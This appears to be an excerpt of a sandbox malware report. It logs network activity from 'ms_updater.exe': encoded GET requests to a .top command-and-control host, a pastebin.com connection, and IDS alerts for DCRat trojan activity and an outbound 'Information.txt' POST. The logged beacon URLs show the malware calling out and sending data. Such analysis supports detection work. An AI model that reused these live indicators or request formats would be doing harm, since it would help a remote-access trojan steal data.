2804 | ms_updater.exe | GET | 200 | 104.21.1.107:80 | http://714745cm.nyashland.top/nyashsupport.php?h1Gu59oh2INmj1v=1gs2kEUBpksW&ZsAPnQSg6w0GB8g08gBSmlqMn1dh=EVRR&17789cb3578c6680ba919ed580bcbc59=c33b5fda8c587ac7ab22b49b86ea1260&024ace78b46de9dec7d33cd74bf374d2=AM5gzYmdjMklTM3QGNjJjNkdzY1QjYjFTMjhzM5YTN4UGNxgTZ3ITZ&h1Gu59oh2INmj1v=1gs2kEUBpksW&ZsAPnQSg6w0GB8g08gBSmlqMn1dh=EVRR | unknown | text | 2.08 Kb | unknown |
2804 | ms_updater.exe | GET | 200 | 104.21.1.107:80 | http://714745cm.nyashland.top/nyashsupport.php?mb2255vFyJmqs0vi1oEkF3=9dM5&8a43ab91d2d0ada45cd5ce27b80065c2=QNxczMhhTMwADM2AzNyMDM3YjZlRmM4kjZ4AjZkRTNhZDNmFTM5gTM2MTMyMTNzkDNyYzN4kTO&024ace78b46de9dec7d33cd74bf374d2=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&b198abe6c77070427ef5e91e8d5ed825=d1nI0YGO5gjMmZGMjZjYyYmNmFTYhBTOkBjZkNzNhhjYyM2Y1MWMjdzM3IiOiATM2QzY4UmNkhzM5EWN0IGZ0IGNhRjN2Q2YmJzN3QTZiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiUTN0EGM4cTN2UTM3YDZklTZjhTMhVmNwYjN3ADO0gTOis3W | unknown | text | 104 b | unknown |
2804 | ms_updater.exe | GET | 200 | 104.21.1.107:80 | http://714745cm.nyashland.top/nyashsupport.php?mb2255vFyJmqs0vi1oEkF3=9dM5&8a43ab91d2d0ada45cd5ce27b80065c2=QNxczMhhTMwADM2AzNyMDM3YjZlRmM4kjZ4AjZkRTNhZDNmFTM5gTM2MTMyMTNzkDNyYzN4kTO&024ace78b46de9dec7d33cd74bf374d2=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&4b3611644f70fc2d5fba382ed48274b0=0VfiIiOiYmZ3UmM5EDN3kzM4UTZzYzN2IWO2ImMxUWMyImY2MzNiwiIyQjY5MWN5ITMxUGZiFmZhZWMmVmZmRmMhFWNxQzNlJzMmVWZ4AjZhJiOiATM2QzY4UmNkhzM5EWN0IGZ0IGNhRjN2Q2YmJzN3QTZiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiUTN0EGM4cTN2UTM3YDZklTZjhTMhVmNwYjN3ADO0gTOis3W | unknown | text | 104 b | unknown |
2804 | ms_updater.exe | GET | 200 | 104.21.1.107:80 | http://714745cm.nyashland.top/nyashsupport.php?mb2255vFyJmqs0vi1oEkF3=9dM5&8a43ab91d2d0ada45cd5ce27b80065c2=QNxczMhhTMwADM2AzNyMDM3YjZlRmM4kjZ4AjZkRTNhZDNmFTM5gTM2MTMyMTNzkDNyYzN4kTO&024ace78b46de9dec7d33cd74bf374d2=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&4b3611644f70fc2d5fba382ed48274b0=0VfiIiOiYmZ3UmM5EDN3kzM4UTZzYzN2IWO2ImMxUWMyImY2MzNiwiI0YGO5gjMmZGMjZjYyYmNmFTYhBTOkBjZkNzNhhjYyM2Y1MWMjdzM3IiOiATM2QzY4UmNkhzM5EWN0IGZ0IGNhRjN2Q2YmJzN3QTZiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiUTN0EGM4cTN2UTM3YDZklTZjhTMhVmNwYjN3ADO0gTOis3W | unknown | text | 104 b | unknown |
2804 | ms_updater.exe | GET | 200 | 104.21.1.107:80 | http://714745cm.nyashland.top/nyashsupport.php?mb2255vFyJmqs0vi1oEkF3=9dM5&8a43ab91d2d0ada45cd5ce27b80065c2=QNxczMhhTMwADM2AzNyMDM3YjZlRmM4kjZ4AjZkRTNhZDNmFTM5gTM2MTMyMTNzkDNyYzN4kTO&024ace78b46de9dec7d33cd74bf374d2=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&9d68fd20db10d46579acac1fdc533db7=d1nIPBHRkxGeHJGakZUS2JFSjVjSzE1ZNhVWJBXUE9EcERGb4dkYoRmRJxmTYlVa1cVY25UbD5ENr9EMWdkYzZkMWdWUYplbShVYpBXUE9EcERGb4dkYoRmRJRDdyI2SwcGV2EFWaNHeXlFWCNEZ6ZlbjBDcRR0TwREZsh3RihGZGlkeWhkW2hGWatEMnRlNRhlWzh3VZhlQTFmdKNjYaBXUE9EcERGb4dkYoRmRJlmVyY1Z0ADVVBXUE9EcERGb4dkYoRmRJRXOHRWdGdUYRBXUE9EcERGb4dkYoRmRJlmVyY1ZVJTW1ZUbiBnSrNkT0s2TwY1RiNnRyY1Z0cVY1lTbVtEMnRlNRhlWzh3VZhlQ5FWdsdEV1lTbjVFcRR0TwREZsh3RihGZGlkcOhVWOZ0RkxWMrNkT0s2TwY1RiNnRyY1ZnJzYo5UbXtEMnRlNRhlWzh3VZhlQ5JWeW1mY2FzaD5ENr9EMWdkYzZkMWdWVtNmdOtmYwljMZxmUYFWTwFFRPBHRkxGeHJGakZUS6ZFSaZHaYJ1SwcGV2EFWaNHeXlFWCNlYxYVbjxGaHRmRwFFRPBHRkxGeHJGakZUS0ZlbjBjTXp1cWt2QORzaPBjVHJ2cGJjVnVVbjZnTFFmeGdkULBzZUZTUYp1c4dVWYJUaiBXOykFbShVZDBXUE9EcERGb4dkYoRmRJxmSzIGR1cVY250RkBnSrNkT0s2TwY1RiNnRyY1ZNdVY0lzRkJEcRR0TwREZsh3RihGZGlUNKNjY0pEWRtEMnRlNRhlWzh3VZhlQTpla1cVW1xWbRJiOiYmZ3UmM5EDN3kzM4UTZzYzN2IWO2ImMxUWMyImY2MzNiwiI0YGO5gjMmZGMjZjYyYmNmFTYhBTOkBjZkNzNhhjYyM2Y1MWMjdzM3IiOiATM2QzY4UmNkhzM5EWN0IGZ0IGNhRjN2Q2YmJzN3QTZiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiUTN0EGM4cTN2UTM3YDZklTZjhTMhVmNwYjN3ADO0gTOis3W | unknown | text | 104 b | unknown |
2804 | ms_updater.exe | GET | 200 | 104.21.1.107:80 | http://714745cm.nyashland.top/nyashsupport.php?mb2255vFyJmqs0vi1oEkF3=9dM5&8a43ab91d2d0ada45cd5ce27b80065c2=QNxczMhhTMwADM2AzNyMDM3YjZlRmM4kjZ4AjZkRTNhZDNmFTM5gTM2MTMyMTNzkDNyYzN4kTO&024ace78b46de9dec7d33cd74bf374d2=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&9d68fd20db10d46579acac1fdc533db7=d1nI5oUeaVHbXJGa50WVjhnVZBjRHJ1dChVUjhHbiBXMHpFa4ZEW6pEWapnVGh1YwpXUp9maJ9mUYlVUKNETpRjMkZXNyEWdWxWS2k0QhBjRHV1aKNjYq5EWhVkSDxUaJl2Tpd2RkhmQWJGaKNjWsh3VaVlSDxUaJl2Tp1ESjdnRVJGaWdEZUp0QMlGNyQmd1ITY1ZFbJZTSDJlSKhlW6ZlVihmVHRGVKNETp10Mi5GbtN2aG12Ymh3VaBnSulFak1WS2kUajxmTYZFdGdlWw4EbJN3dHJWM102TpNWbihGeVJGaWdEZUp0QMlGMXlFbSNzY21EWaNHbtp1ZwcVW5RmMilnQzwkNN1WS2k0QhBjRHVFdGdlWw4EbJNXSTtkdsdkWxYURJNza6pERGVUSyZ1RkNnRXp1UoNUS1xWRJxWNXFWT1cEW5hXMiBnUXRmQClnT1MWeRJkQ5FGbShkYoZVbV9WQTpVd5cUY3lTbjpGbXRVavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiYmZ3UmM5EDN3kzM4UTZzYzN2IWO2ImMxUWMyImY2MzNiwiIyQjY5MWN5ITMxUGZiFmZhZWMmVmZmRmMhFWNxQzNlJzMmVWZ4AjZhJiOiATM2QzY4UmNkhzM5EWN0IGZ0IGNhRjN2Q2YmJzN3QTZiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiUTN0EGM4cTN2UTM3YDZklTZjhTMhVmNwYjN3ADO0gTOis3W | unknown | text | 104 b | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
1080 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
2804 | ms_updater.exe | 104.20.68.143:443 | pastebin.com | CLOUDFLARENET | — | unknown |
2804 | ms_updater.exe | 104.21.1.107:80 | 714745cm.nyashland.top | CLOUDFLARENET | — | unknown |
Domain | IP | Reputation |
|---|---|---|
pastebin.com |
| shared |
714745cm.nyashland.top |
| unknown |
PID | Process | Class | Message |
|---|---|---|---|
1080 | svchost.exe | Potentially Bad Traffic | ET DNS Query to a *.top domain - Likely Hostile |
2804 | ms_updater.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |
2804 | ms_updater.exe | Potentially Bad Traffic | ET INFO HTTP Request to a *.top domain |
2804 | ms_updater.exe | A Network Trojan was detected | ET HUNTING Observed Malicious Filename in Outbound POST Request (Information.txt) |